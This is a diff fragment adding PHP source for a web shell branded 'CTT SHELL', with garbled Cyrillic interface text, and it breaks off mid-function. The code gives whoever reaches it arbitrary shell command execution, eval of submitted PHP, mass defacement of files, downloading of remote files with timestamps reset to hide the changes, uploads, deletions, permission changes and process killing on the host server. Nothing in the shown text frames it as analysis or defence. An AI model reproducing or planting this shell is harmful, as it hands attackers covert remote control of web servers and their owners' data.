+ if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Deface took ".$defacetime." secs</b><br><br>";}
+}
+if ($act == "search")
+{
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $a = array
+  (
+"name"=>$search_name, "name_regexp"=>$search_name_regexp,
+"text"=>$search_text, "text_regexp"=>$search_text_regxp,
+"text_wwo"=>$search_text_wwo,
+"text_cs"=>$search_text_cs,
+"text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v)
+  {
+ctfsearch($v);
+  }
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+$ls_arr = $found;
+$disp_fullpath = true;
+$act = $dspact = "ls";
+  }
+ }
+ echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
+<b>Search for (file/directory name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".gchds($search_name_regexp,1," checked")."> - regexp
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".gchds($search_text_regexp,1," checked")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".gchds($search_text_wwo,1," checked")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".gchds($search_text_cs,1," checked")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".gchds($search_text_not,1," checked")."> - find files <u>NOT</u> containing the text
+<br><br><input type=\"submit\" name=\"submit\" value=\"Search\"></form>";
+ if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $perms = fileperms($d.$f);
+ if (!$perms) {echo "Can't get current mode.";}
+ elseif ($submit)
+ {
+  if (!isset($owner[0])) {$owner[0] = 0;}
+  if (!isset($owner[1])) {$owner[1] = 0; }
+  if (!isset($owner[2])) {$owner[2] = 0;}
+  if (!isset($group[0])) {$group[0] = 0;}
+  if (!isset($group[1])) {$group[1] = 0;}
+  if (!isset($group[2])) {$group[2] = 0;}
+  if (!isset($world[0])) {$world[0] = 0;}
+  if (!isset($world[1])) {$world[1] = 0;}
+  if (!isset($world[2])) {$world[2] = 0;}
+  $sum_owner = $owner[0] + $owner[1] + $owner[2];
+  $sum_group = $group[0] + $group[1] + $group[2];
+  $sum_world = $world[0] + $world[1] + $world[2];
+  $sum_chmod = "0".$sum_owner.$sum_group.$sum_world;
+  $ret = @chmod($d.$f, $sum_chmod);
+  if ($ret) {$act = "ls";}
+  else {echo "<b>Èçìåíåíèå Àòðèáóò Ôàéëà (".$d.$f.")</b>: Îøèáêà<br>";}
+ }
+ else
+ {
+  echo "<center><b>Èçìåíåíèå Àòðèáóò Ôàéëà</b><br>";
+  $perms = view_perms(fileperms($d.$f));
+  $length = strlen($perms);
+  $owner_r = $owner_w = $owner_x =
+  $group_r = $group_w = $group_x = 
+  $world_r = $world_w = $group_x = "";
+
+  if ($perms[1] == "r") {$owner_r = " checked";} if ($perms[2] == "w") {$owner_w = " checked";}
+  if ($perms[3] == "x") {$owner_x = " checked";} if ($perms[4] == "r") {$group_r = " checked";}
+  if ($perms[5] == "w") {$group_w = " checked";} if ($perms[6] == "x") {$group_x = " checked";}
+  if ($perms[7] == "r") {$world_r = " checked";} if ($perms[8] == "w") {$world_w = " checked";}
+ if ($perms[9] == "x") {$world_x = " checked";}
+  echo "<form method=\"POST\"><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value='".htmlspecialchars($f)."'>
+<input type=hidden name=act value=chmod><input type=hidden name=submit value=1><input type=hidden name='owner[3]' value=no_error>
+<input type=hidden name='group[3]' value=no_error><input type=hidden name='world[3]' value=no_error>
+<table class=table1><tr><td class=td2><table class=table1 align=center width=300 border=0 cellspacing=0 cellpadding=5><tr><td class=td2><b>Owner</b><br><br>
+<input type=checkbox NAME=owner[0] value=4".$owner_r.">Read<br><input type=checkbox NAME=owner[1] value=2".$owner_w.">Write<br>
+<input type=checkbox NAME=owner[2] value=1".$owner_x.">Execute</font></td><td class=td2><b>Group</b><br><br>
+<input type=checkbox NAME=group[0] value=4".$group_r.">Read<br>
+<input type=checkbox NAME=group[1] value=2".$group_w.">Write<br>
+<input type=checkbox NAME=group[2] value=1".$group_x.">Execute</font></td>
+<td class=td2><b>World</b><br><br><input type=checkbox NAME=world[0] value=4".$world_r.">Read<br>
+<input type=checkbox NAME=world[1] value=2".$world_w.">Write<br>
+<input type=checkbox NAME=world[2] value=1".$world_x.">Execute</font></td>
+</tr></table></td></tr><tr align=center><td><input type=submit name=chmod value=\"Ñîõðàíèòü\"></td></tr></table></FORM></center>";
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\","/",$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile[tmp_name]))
+  {
+if (empty($uploadfilename)) {$destin = $uploadfile[name];}
+else {$destin = $userfilename;}
+if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Îøèáêà, çàãðóæàþùàÿ ôàéë ".$uploadfile[name]." (íå ìîæåò ñêîïèðîâàòü \"".$uploadfile[tmp_name]."\" íà \"".$uploadpath.$destin."\"!<br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+else
+{
+ $destin = explode("/",$destin);
+ $destin = $destin[count($destin)-1];
+ if (empty($destin))
+ {
+  $i = 0;
+  $b = "";
+  while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+}
+if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+else
+{
+ $st = getmicrotime();
+ $content = @file_get_contents($uploadurl);
+ $dt = round(getmicrotime()-$st,4);
+ if (!$content) {$uploadmess .=  "Íå ìîæåò çàãðóçèòü ôàéë!<br>";}
+ else
+ {
+  if ($filestealth) {$stat = stat($uploadpath.$destin);}
+  $fp = fopen($uploadpath.$destin,"w");
+  if (!$fp) {$uploadmess .= "Îøèáêà, ïèøóùàÿ ôàéëó ".htmlspecialchars($destin)."!<br>";}
+  else
+  {
+fwrite($fp,$content,strlen($content));
+fclose($fp);
+if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+  }
+ }
+}
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>Çàãðóçêà Ôàéëà:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$sul."act=upload&d=".urlencode($d)."\" method=\"POST\">
+Ëîêàëüíûé ôàéë: <br><input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;èëè<br>
+Çàãðóçèòü èç URL: <br><input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Ñîõðàíèòü ýòîò ôàéëü â ïàïêó: <br><input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+Èìÿ Ôàéëà: <br><input name=uploadfilename size=25>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;Êîíâåðòèðîâàòü èìÿ ôàéëà<br><br>
+<input type=\"submit\" name=\"submit\" value=\"Çàãðóçèòü\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = false;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($v)."<br>";}
+  if (!empty($delerr)) {echo "<b>Óäàëåíèå ñ îøèáêàìè:</b><br>".$delerr;}
+ }
+ $act = "ls";
+}
+if ($act == "onedelete")
+{
+ $delerr = "";
+  $result = false;
+  $result = fs_rmobj($f);
+  if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($f)."<br>";}
+  if (!empty($delerr)) {echo "<b>Óäàëåíèå ñ îøèáêàìè:</b><br>".$delerr;}
+ $act = "ls";
+}
+if ($act == "onedeleted")
+{
+ $delerr = "";
+  $result = false;
+  $result = fs_rmobj($d+'/'+$f);
+  if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($f)."<br>";}
+  if (!empty($delerr)) {echo "<b>Óäàëåíèå ñ îøèáêàìè:</b><br>".$delerr;}
+ $act = "ls";
+}
+if ($act == "deface")
+{
+ $deferr = "";
+ foreach ($actbox as $v)
+ {
+  $data = $deface_html;
+  if (eregi("%%%filedata%%%",$data)) {$data = str_replace("%%%filedata%%%",file_get_contents($v),$data);}
+  $data = str_replace("%%%filename%%%",basename($v),$data);
+  $data = str_replace("%%%filepath%%%",$v,$data);
+  $fp = @fopen($v,"w");
+  fwrite($fp,$data);
+  fclose($fp);
+  if (!$result) {$deferr .= "Can't deface ".htmlspecialchars($v)."<br>";}
+  if (!empty($delerr)) {echo "<b>Defacing with errors:</b><br>".$deferr;}
+ }
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); ct_sess_put($sess_data); $act = "ls";}
+ if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); ct_sess_put($sess_data); $act = "ls";}
+ if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); ct_sess_put($sess_data); $act = "ls";}
+ 
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); ct_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_copy_obj($v,$d)) {$psterr .= "Íå ìîæåò ñêîïèðîâàòü ".$v." to ".$to."!<br>";}
+if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_move_obj($v,$d)) {$psterr .= "Íå ìîæåò ïåðåìåñòèòüñÿ ".$v." to ".$to."!<br>";}
+unset($sess_data["cut"][$k]);
+  }
+  ct_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Ïðèêëåèâàíèå ñ îøèáêàìè:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  
+  if ($ext == ".tar.gz")
+  {
+$cmdline = "tar cfzv";
+  }
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+$v = str_replace("\\","/",$v);
+if (is_dir($v))
+{
+ if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";}
+ $v .= "*";
+}
+$cmdline .= " ".$v;
+  }
+  $ret = `$cmdline`;
+  if (empty($ret)) {$arcerr .= "Íå ìîæåò íàçâàòü archivator!<br>";}
+  $ret = str_replace("\r\n","\n");
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+if (in_array($v,$ret)) {fs_rmobj($v);}
+unset($sess_data["cut"][$k]);
+  }
+  ct_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_copy_obj($v,$d)) {$psterr .= "Íå ìîæåò ñêîïèðîâàòü ".$v." to ".$to."!<br>";}
+if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_move_obj($v,$d)) {$psterr .= "Íå ìîæåò ïåðåìåñòèòüñÿ ".$v." to ".$to."!<br>";}
+unset($sess_data["cut"][$k]);
+  }
+  ct_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Ïðèêëåèâàíèå ñ îøèáêàìè:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+while ($o = readdir($h)) {$list[] = $d.$o;}
+closedir($h);
+  }
+ }
+ if (count($list) == 0) {echo "<center><b>Íå ìîæåò îòêðûòü ñïðàâî÷íèê (".htmlspecialchars($d).")!</b></center>";}
+ else
+ {
+  $tab = array();
+  $amount = count($ld)+count($lf);
+  $vd = "f"; 
+  if ($vd == "f")
+  {
+$row = array();
+$row[] = "<b><center>Èìÿ</b>";
+$row[] = "<b><center>Ðàçìåð</center></b>";
+$row[] = "<b><center>Èçìåíåí</center></b>";
+if (!$win)
+  {$row[] = "<b><center>Âëàäåëåö/Ãðóïïà</center></b>";}
+$row[] = "<b><center>Ïðàâà</center></b>";
+$row[] = "<b><center>Ôóíêöèè</center></b>";
+
+$k = $sort[0];
+if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;}
+if (empty($sort[1])) {$sort[1] = "d";}
+if ($sort[1] != "a")
+{
+ $y = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$k."a\"><img src=\"".$sul."act=img&img=sort_desc\" border=\"0\"></a></center>";
+}
+else
+{
+ $y = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$k."d\"><img src=\"".$sul."act=img&img=sort_asc\" border=\"0\"></a></center>";
+}
+
+$row[$k] .= $y;
+for($i=0;$i<count($row)-1;$i++)
+{
+ if ($i != $k) {$row[$i] = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$sort[1]."\">".$row[$i]."</a>";}
+}
+
+$tab = array();
+$tab[cols] = array($row);
+$tab[head] = array();
+$tab[dirs] = array();
+$tab[links] = array();
+$tab[files] = array();
+
+foreach ($list as $v)
+{
+ $o = basename($v);
+ $dir = dirname($v);
+  
+ if ($disp_fullpath) {$disppath = $v;}
+ else {$disppath = $o;}
+ $disppath = str2mini($disppath,60);
+  
+ if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+ elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+
+ $uo = urlencode($o);
+ $ud = urlencode($dir);
+ $uv = urlencode($v);
+
+ $row = array();
+
+if (is_dir($v))
+ {
+  if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";}
+  else {$type = "DIR";}
+  $row[] =  "<a href=\"".$sul."act=ls&d=".$uv."&sort=".$sort."\"> <img src=\"".$sul."act=img&img=small_dir\" height=\"16\" width=\"16\" border=\"0\">&nbsp; ".$disppath."</a>";
+  $row[] = $type;
+ }
+ elseif(is_file($v))
+ {
+  $ext = explode(".",$o);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $row[] =  "<a href=\"".$sul."act=f&f=".$uo."&d=".$ud."&\"><img src=\"".$sul."act=img&img=ext_".$ext."\" height=\"16\" width=\"16\" border=\"0\">&nbsp; ".$disppath."</a>";
+  $row[] = view_size(filesize($v));
+ }
+ $row[] = "<center>".date("d.m.Y H:i:s",filemtime($v))."</center>";
+  
+ if (!$win)
+ {
+  $ow = @posix_getpwuid(fileowner($v));
+  $gr = @posix_getgrgid(filegroup($v));
+  $row[] = "<center>".$ow["name"]."/".$gr["name"]."</center>";
+ }
+
+ if (is_writable($v)) {$row[] = "<a href=\"".$sul."act=chmod&f=".$uo."&d=".$ud."\">".view_perms(fileperms($v))."</a>";}
+ else {$row[] = "<a href=\"".$sul."act=chmod&f=".$uo."&d=".$ud."\"><font color=\"red\">".view_perms(fileperms($v))."</font></a>";}
+
+ if (is_dir($v)) {$row[] = "&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">&nbsp;<a href=\"".$sul."act=onedeleted&f=".$uo."&d=".$ud."\"><img src=\"".$sul."act=img&img=odel\" title=\"Delete\" height=\"16\" width=\"19\" border=\"0\"></a>";}
+ else {$row[] = "&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">&nbsp;<a href=\"".$sul."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$sul."act=img&img=change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$sul."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$sul."act=img&img=download\" title=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$sul."act=onedelete&f=".$uo."&d=".$ud."\"><img src=\"".$sul."act=img&img=odel\" title=\"Delete\" height=\"16\" width=\"19\" border=\"0\"></a>";}
+
+ if (($o == ".") or ($o == "..")) {$tab[head][] = $row;}
+ elseif (is_link($v)) {$tab[links][] = $row;}
+ elseif (is_dir($v)) {$tab[dirs][] = $row;}
+ elseif (is_file($v)) {$tab[files][] = $row;}
+}
+  }
+  $v = $sort[0];
+  function tabsort($a, $b)
+  {
+global $v;
+return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v]));
+  }
+  usort($tab[dirs], "tabsort");
+  usort($tab[files], "tabsort");
+  if ($sort[1] == "a")
+  {
+$tab[dirs] = array_reverse($tab[dirs]);
+$tab[files] = array_reverse($tab[files]);
+  }
+  $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]);
+  echo "<TABLE class=table1  cellSpacing=0 cellPadding=0 width=100% border=0>
+<form method=\"POST\">";
+$smsn=0;
+  foreach($table as $row)
+  {
+$smsn++;
+ if ($smsn!=2 && $smsn!=3) { 
+echo "<tr>\r\n";
+foreach($row as $v) {echo "<td class=tds1 bgcolor=#242424>".$v."</td>\r\n";}
+echo "</tr>\r\n";
+}
+
+  }
+  echo "</table><TABLE height=1% class=table2 cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#333333 border=0>
+<tr class=tr2>
+<td width=8% height=1%><font size=2 color=#000000>
+Ïàïêè: ".(count($tab[dirs])+count($tab[links]))."</font></td>
+<td width=8% height=1%><font size=2 color=#000000> Ôàéëû: ".count($tab[files])."</font></td><td height=1% vAlign=top align=right>";
+if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+echo "<input type=\"submit\" name=\"actarcbuff\" value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actpastebuff\" value=\"Âñòàâèòü\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actemptybuff\" value=\"Ïóñòîé áóôåð\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=\"act\"><option value=\"".$act."\">Ñ îòîáðàííûì:</option>";
+  echo "<option value=\"delete\"".gchds($dspact,"delete"," selected").">Óäàëèòü</option>";
+  if ($usefsbuff)
+  {
+echo "<option value=\"cut\"".gchds($dspact,"cut"," selected").">Âûðàçàòü</option>";
+echo "<option value=\"copy\"".gchds($dspact,"copy"," selected").">Êîïèðîâàòü</option>";
+echo "<option value=\"unselect\"".gchds($dspact,"unselect"," selected").">Íåâûáðàòü</option>";
+  }
+  if ($dspact == "massdeface") {echo "<option value=\"deface\"".gchds($dspact,"deface"," selected").">Íåâûáðàòü</option>";}
+  echo "</select>&nbsp;<input type=\"submit\" value=\"Ïîäòâåðäèòü\">";
+  echo "</form>";
+
+echo "</td></tr></table>";
+echo "</td></tr></table><br><center><font size=2 color=#aaaaaa>[<a href=http://ctt.void.ru>CTT</a>] SHELL ver ".$shver."</font></center>";
+ }
+
+}
+if ($act == "cmd")
+{
+ if (!empty($submit))
+ {
+  echo "<b>Ðåçóëüòàò âûïîëíåíèÿ ýòà êîìàíäà</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+ob_clean();
+myshellexec($cmd);
+$ret = ob_get_contents();
+$ret = convert_cyr_string($ret,"d","w");
+ob_clean();
+echo $tmp;
+if ($cmd_txt)
+{
+ $rows = count(explode("
+",$ret))+1;
+ if ($rows < 10) {$rows = 10;}
+ echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+}
+else {echo $ret;}
+  }
+  else
+  {
+if ($cmd_txt)
+{
+ echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+ myshellexec($cmd);
+ echo "</textarea>";
+}
+else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Êîìàíäà âûïîëíåíèÿ:</b>";  if (empty($cmd_txt)) {$cmd_txt = true;}}
+ echo "<form action=\"".$sul."act=cmd\" method=\"POST\"><textarea name=\"cmd\" cols=\"122\" rows=\"10\">".htmlspecialchars($cmd)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" name=\"submit\" value=\"Âûïîëíèòü\"><input type=\"hidden\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "ps_aux")
+{
+ echo "<b>Ïðîöåññû:</b><br>";
+ if ($win) {
+echo "<pre>";
+system('tasklist');
+echo "</pre>";
+}
+ else
+ {
+  if ($pid)
+  {
+if (!$sig) {$sig = 9;}
+echo "Sending signal ".$sig." to #".$pid."... ";
+$ret = posix_kill($pid,$sig);
+if ($ret) {echo "ok. he is dead, amen.";}
+else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";}
+  }
+  $ret = `ps -aux`;
+  if (!$ret) {echo "Can't execute \"ps -aux\"!";}
+  else
+  {
+$ret = htmlspecialchars($ret);
+$ret = str_replace(""," ",$ret);
+while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+$prcs = explode("\n",$ret);
+$head = explode(" ",$prcs[0]);
+$head[] = "ACTION";
+unset($prcs[0]);
+echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+echo "<tr border=\"1\">";
+foreach ($head as $v) {echo "<td><b>&nbsp;&nbsp;&nbsp;".$v."</b>&nbsp;&nbsp;&nbsp;</td>";}
+echo "</tr>";
+foreach ($prcs as $line)
+{
+ if (!empty($line))
+ {
+  echo "<tr>";
+  $line = explode(" ",$line);
+  $line[10] = join(" ",array_slice($line,10,count($line)));
+  $line = array_slice($line,0,11);
+  $line[] = "<a href=\"".$sul."act=ps_aux&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+  foreach ($line as $v) {echo "<td>&nbsp;&nbsp;&nbsp;".$v."&nbsp;&nbsp;&nbsp;</td>";}
+  echo "</tr>";
+ }
+}
+echo "</table>";
+  }
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Ðåçóëüòàò âûïîëíåíèÿ ýòîò PHP-êîä</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+ob_clean();
+eval($eval);
+$ret = ob_get_contents();
+$ret = convert_cyr_string($ret,"d","w");
+ob_clean();
+echo $tmp;
+if ($eval_txt)
+{
+ $rows = count(explode("
+",$ret))+1;
+ if ($rows < 10) {$rows = 10;}
+ echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+}
+else {echo $ret;}
+  }
+  else
+  {
+if ($eval_txt)
+{
+ echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+ eval($eval);
+ echo "</textarea>";
+}
+else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>PHP-êîä âûïîëíåíèÿ</b>"; if (empty($eval_txt)) {$eval_txt = true;}}
+ echo "<form method=\"POST\"><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=\"hidden\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" value=\"Âûïîëíèòü\"></form>";
+}
+if ($act == "f")
+{
+ $r = @file_get_contents($d.$f);
+ if (!is_readable($d.$f) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$sul."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v)
+  {
+if (in_array($ext,$v)) {$rft = $k; break;}
+  }
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+
+  echo "<b>Ðàññìîòðåíèå ôàéëà:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$sul."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  if (is_writable($d.$f)) {echo "<font color=\"green\">Ïîëíûé äîñòóï ÷òåíèÿ/çàïèñè (".view_perms(fileperms($d.$f)).")</font>";}
+  else {echo "<font color=\"red\">Read-Only (".view_perms(fileperms($d.$f)).")</font>";}
+ 
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+echo "<b>Information:</b>";
+echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
+echo "<tr class=tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr>";
+echo "<tr class=tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+if (!$win)
+{
+ echo "<tr class=tr><td><b>Owner/Group</b></td><td> ";
+ $tmp=posix_getpwuid(fileowner($d.$f));
+ if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+ else echo $tmp['name']." ";
+ $tmp=posix_getgrgid(filegroup($d.$f));
+ if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+ else echo $tmp['name'];
+}
+echo "<tr class=tr><td><b>Perms</b></td><td>";
+
+if (is_writable($d.$f))
+{
+ echo "<font color=\"green\">".view_perms(fileperms($d.$f))."</font>";
+}
+else
+{
+ echo "<font>".view_perms(fileperms($d.$f))."</font>";
+}
+
+echo "</td></tr>";
+echo "<tr class=tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
+echo "<tr class=tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
+echo "<tr class=tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
+echo "</table><br>";
+
+
+$fi = fopen($d.$f,"rb");
+if ($fi)
+{
+ if ($fullhexdump)
+ {
+  echo "<b>FULL HEXDUMP</b>";
+  $str=fread($fi,filesize($d.$f));
+ }
+ else
+ {
+  echo "<b>HEXDUMP PREVIEW</b>";
+  $str=fread($fi,$hexdump_lines*$hexdump_rows);
+ }
+ $n=0;
+ $a0="00000000<br>";
+ $a1="";
+ $a2="";
+ for ($i=0; $i<strlen($str); $i++)
+ {
+  $a1.=sprintf("%02X",ord($str[$i])).' ';
